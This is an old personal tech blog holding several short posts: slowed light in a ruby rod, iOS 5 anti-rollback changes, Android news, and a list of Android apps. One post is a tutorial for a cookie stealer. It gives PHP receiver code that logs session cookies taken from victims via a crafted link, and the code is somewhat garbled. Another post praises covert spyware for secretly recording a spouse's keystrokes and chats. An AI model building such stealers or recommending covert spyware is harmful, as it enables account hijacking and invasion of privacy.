Sunday, July 10, 2011

What if Speed of Light comes to Crawl !!

Well, we all know, light is the fastest thing in the universe. The complete physics depends upon the speed of light. But what if, the light comes to crawl ??
This is the biggest question that arises in every ones mind. Scientist have been working over it for decades. and there years of hard work is paying them now. And the scientists at the University of Glasgow have achieved a breakthrough in this area. They've managed to slow the speed of light to a relative crawl – 741 miles per hour, or about the speed of sound. While that’s still fast relative to our own experience, remember that in a vacuum, the speed of light is 186,252 miles per second. So this is an incredible achievement.

Here’s how it works:
In research detailed in the latest edition of the journal Science, researchers Dr Sonja Franke-Arnold, Dr Graham Gibson and Prof Padgett, in collaboration with their colleague Professor Robert Boyd at the Universities of Ottowa and Rochester, took a different approach and set up an experiment: shining a primitive image made up of the elliptical profile of a green laser through a ruby rod spinning on its axis at up to 3,000 rpm.
Once the light enters the ruby, its speed is slowed down to around the speed of sound (approximately  741mph) and the spinning motion of the rod drags the light with it, resulting in the image being rotated by almost five degrees: large enough to see with the naked eye.
The rotation of the image is significant because, according to Dr. Franke-Arnold it can be used to encode information, giving the technique a possible application in computing. “Images are information and the ability to store their intensity and phase is an important step to the optical storage and processing of quantum information, potentially achieving what no classical computer can ever match.”

Saturday, July 9, 2011

Bad News for Jailbreakers

Don't worry, you wont be fined or put behind bars for jail breaking. Its the Apple.Inc, whose going to make it difficult for the people to Jail Break iOS. Apple.Inc is coming up with their new OS i.e iOS 5& they believe it won't be easy to beak it.
 "Apple to prevent iDevices from being rolled back to previous versions", says the experts.

The iPhone Dev Team talked about Apple’s plan on making your jailbreak experience a bit more miserable by preventing your devices from being rolled back to previous iOS versions. The new changes will occur once iOS 5 becomes official but what’s important here is that all current iDevices, up to the iPad 2, will be jail breakable for life even after iOS 5 arrives.

Starting with the iOS5 beta, the role of the “APTicket” is changing — it’s being used much like the “BBTicket” has always been used. The LLB and iBoot stages of the boot sequence are being refined to depend on the authenticity of the APTicket, which is uniquely generated at each and every restore (in other words, it doesn’t depend merely on your ECID and firmware version…it changes every time you restore, based partly on a random number). This APTicket authentication will happen at every boot, not just at restore time. Because only Apple has the crypto keys to properly sign the per-restore APTicket, replayed APTickets are useless.
This will only affect restores starting at iOS5 and onward, and Apple will be able to flip that switch off and on at will (by opening or closing the APTicket signing window for that firmware, like they do for the BBTicket). geo hot’s limera1n exploit occurs before any of this new checking is done, so tethered jailbreaks will still always be possible for devices where limera1n applies. Also, restoring to pre-5.0 firmwares with saved blobs will still be possible (but you’ll soon start to need to use older iTunes versions for that). 
Although it’s always been just “a matter of time” before Apple started doing this (they’ve always done this with the BBTicket), it’s still a significant move on Apple’s part (and it also dovetails with certain technical requirements of their upcoming OTA “delta” updates).

Best Of Luck Jail Breakers...!

Friday, July 8, 2011

This Ice Cream Sandwich never melts !

Google's rising stats shows, there Operating System Android is the past, present n future of technology. With this, rising popularity they are coming up with a new Operating System called ' Ice Cream Sandwich' by the end of this year. The goal is to create a unified operating system that runs on phones, tablets and TVs. And also the updated Honeycomb 3.1 is available in market which adds support to USB accessories.

iPhone/iPod/iPad users can install the latest software updates for at least two years, but that's not always the case when it comes to Android devices. Some Android phones run outdated software at launch and not all of them are updated to the latest version because phone manufacturers and carriers don't think that's really important. Google and some of the other members of the Open Handset Alliance (Verizon, HTC, Samsung, Sprint, Sony Ericsson, LG, T-Mobile, Vodafone, Motorola and AT&T) started to develop some guidelines for updating firmware.

Sunday, January 16, 2011

How to make a COKKIE...?

 There are two components in a cookie stealer: the senderand the receiver. 

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Php Coding a receiver is the part. Only two things are needed to make a receiver : a webhost/ftp which supports PHP, and Notepad.The receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.

php                                      // line 1
$cookie = $HTTP_GET_VARS["cookie"];       // line 2
$file = fopen('cookielog.txt', 'a');     // line 3
fwrite($file, $cookie . "\n\n");        // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Done ! Just upload the files on ftp server and make permission of text file "cookielog.txt" to 777

Monday, January 10, 2011

Hacking ... Not a tough job now !

Hacking Software Programs

The Computer Emergency Response Team (CERT) has warned of the increasing menace of the cyber attack due to the emergence far sharper automated hacking tools, which have been designed to cast maximum impact within the minimum time. 
With a huge number of hacker software the malicious hackers can command distributed systems to scan automatically the systems and attack the systems by taking the immediate advantage of the systems' vulnerable points and exploiting them.
Hundreds of free hacking softwares are easily available and they are so easy to operate, that even a novice can turn to be a highly paid professional. With a wide range of easy-to-use hacking software South Africa has turned to be the hackers' heaven, injecting illegitimate programs into the remote systems by the fraudulent act of breaking into the websites.

Initiate Attacks with Hacking Program

The hackers, by any means, initiate attacks on a Gamco server, which houses innumerable number of websites. By this they can easily gain hassle free access to these sites, with a motive to suck out information and secret records and in cases even money. hacker softwares are technically engineered superior monitoring software products that are used as the hacking programs that help to find out whatever the hacker wants to know. 
A hacker may be a spouse who can use a free hacking program with an intention to know all about his or her wife or husband. Concerned guardians can also hack into the systems of their wards in order to detect their actions and steps.
With a great variety of the easily available password hacking programs a hacker breaks into the sites of small and large business houses, thereby smuggling off all the secret records as regard to the concerns' financial aspects and other movements. 
A wonderful example of such a software program is SpyRecon, which allows a hacker to monitor a remote system from any places - however far it may be. SpyRecon is hacking program - so smart and so strong, that it allows the user to track any targeted system and secretly record everything automatically that is happening to the system targeted. This is perhaps the only hacker software that sends every single recorded activity, login details, keystrokes, screen shots to the required email address and even personal chat conversations. To the utter surprise, the SpyRecon have proved to be cent percent compatible with almost all kinds of major online services or applications like Neopets, Yahoo, AOL, Hotmail, MSN, Livejournals and AIM. 
There exist a huge volume of free hacking softwares just as smart as the SpyRecon, providing the hackers immense pleasure of breaking into the other systems without any affliction. Another such latest hacking program, which one can get for absolutely free, is the Camera/Shy software, released out very recently by a dedicated group of hackers know as Hactivismo.
The activists can exchange banned contents across the World Wide Web with the help of the Camera/Shy software. Since the software is dedicated to the memory of the famous former Chinese leader Wang Ruowang, it has been found that China is the one nation that have shown tremendous interest in the Camera/Shy software. The Steganography software is again another free hacking program that has been designed to be used by more sophisticated users who have got a sound grip over the technical know-how. 

Monday, January 3, 2011

Apps of the year!

2010 was a big year for technology. Google came up with the mobile OS Android in the Indian market as well & became a big success.2010 was a big year for Google's Android mobile operating system, as it moved at a lightning pace from a minority position into the position of most popular operating system in the United States. Still, when retrospectives are put together for "best apps of the year" lists, editors often make choices that seem obvious. We've put one together for 2010 that hopefully avoids the more self-explanatory choices.
Moodagent-- Even though it's frequently chided for being weak in the gaming department when compared to iOS, Android has far more ground to gain against it in the MP3 player category. With the many OEM-skinned media players, the built-in one sometimes looks unremarkable. That's why third party media management apps on Android is a category worth paying attention to. Moodagent is a playlist-creation app that takes the music stored on your Android device and categorizes each song by its "feel."
LOCi-- This GPS tracking app is available for $2.99 in the Android Market, but has the option for a $29.99 annual subscription mode that lets you switch on private, real-time tracking. This lets one user track another user's location live through a desktop Web browser without sharing that location with anyone else. It's a feature not available on the iPhone version of the same app, and is actually surprisingly useful.
My6Sense-- I took a look at this personalized feed reader when it launched in beta last September, and it is one of those rare applications that actually gets better the more you use it.
MicDroid-- Remember "I am T-Pain" for iOS? This is Android's version of that. It's a goofy little autotune sound recorder that is available for free or a $2.99 donation. It's a good source of humorous audio snippets, especially if you use it on people who do not know they're being recorded.
Yahoo! Mail-- Even though Yahoo's Webmail remains extremely popular, there was no easy way to set up Android's native email client to connect to free Yahoo inboxes. Up to the time that this app was released back in July, setting up Yahoo Mail pop3 workarounds was my top Android support request. Now that the app exists, the problem is solved.
Mint-- Intuit's Web-based personal finance site launched its Android app and widget in May 2010, and I took it for a spin when it was in beta. This application really surprised me, and Mint's minimalist design makes for a highly usable app that quickly grows on you.
Bing-- First launched exclusively on Verizon Android devices in August, Bing for Android became available for all users in November. The easy-to-use search app retains Bing's highly visual design and applies it to location-based searches, mapping, news, and movies, and also utilizes Android's sophisticated voice recognition engine for voice-powered Bing searches.
Heavy Gunner 3D-- While I was personally quite disappointed with this game, it is actually a great technical example of how solid a gaming platform Android can be. Utilizing the phone's gyroscopes as well as touch screen, this 3D first-person-shooter is a far cry from the first generation of Android Games launched just one year ago. It's not even remotely as popular as Rovio's Angry Birds, but I feel it's a better display of potential.
Chumby-- This late entrant only launched in the Android Market two weeks ago, and was long overdue, if you ask this Chumby user. What is Chumby? It would be best described as a connected alarm clock that can cycle through different functions as you need them. This app gives a whole new level of functionality to Android devices that utilize charging docks, like the Motorola Droid. With it, the docked phone can cycle through clocks, webcams, photostreams, status updates, and over 1,500 Chumby apps.
shopkick-- Shopkick is a strange location-based rewards app that automatically checks in whenever you enter a participating store. The app then gives the user "kickbucks" that can be redeemed for things like Facebook Credits, song downloads, hotel vouchers, or donations to more than 30 different online charities. It is the latter of these that really makes the app stand out. It's the only location-based shopping app I found this year that can donate to charity every time you walk into a participating store.
Google Books-- 2010 was the year that every major e-book competitor entered the Android space. Borders, Barnes and Noble, and Amazon all had their own apps available in the Android Market when Google launched eBooks. This particular app is especially handy for Android tablets, because it doesn't necessarily require a connection to sync content like other e-reader apps do. This one can store as many as 16,000 e-books on a microSD card for offline reading.
Firefox 4-- The mobile browser from Mozilla formerly known as Fennec had a slow and somewhat buggy start, but for Firefox users, the sync capabilities and promise of similar extension functionality make this browser one with an extremely bright future. It's currently still very much a work in progress, but for all the hype given to Skyfire and Opera on Android, I'm putting my hopes in Firefox.
Springpad-- This one is a bit more of an obvious choice, in my opinion, as it enjoyed quite a bit of publicity when the Android app launched back in May. However, this Web-synced note-taking app still appears to be playing second fiddle to Evernote, so that's why I included it here. The app lets users snap pictures, scan barcodes, take down notes and reminders, or save and share links and content to the web-based Springpad service.
Vonage Talk Free-- Imagine a mobile, voice-enabled Facebook Chat, and you've got Vonage Talk Free. First launched in August, this app lets users place free VoIP calls to Facebook friends with the Vonage Talk Free app installed on their profile. While it does access essentially everything it can possibly access in both your Facebook profile and your Android device, it is a nice feature to be able to use for free.
Winamp-- Pairing Winamp 5.6 with Winamp for Android creates an end-to-end music management solution for your desktop and Android device that rivals the iPhone and iTunes. You can sync your music collection wirelessly, listen to SHOUTCast streaming radio, scrobble, and manage collections via a homescreen widget or lock screen controller. Besides, even if you don't use Winamp on your PC, you have to enjoy Nullsoft's hybrid Android-Llama logo.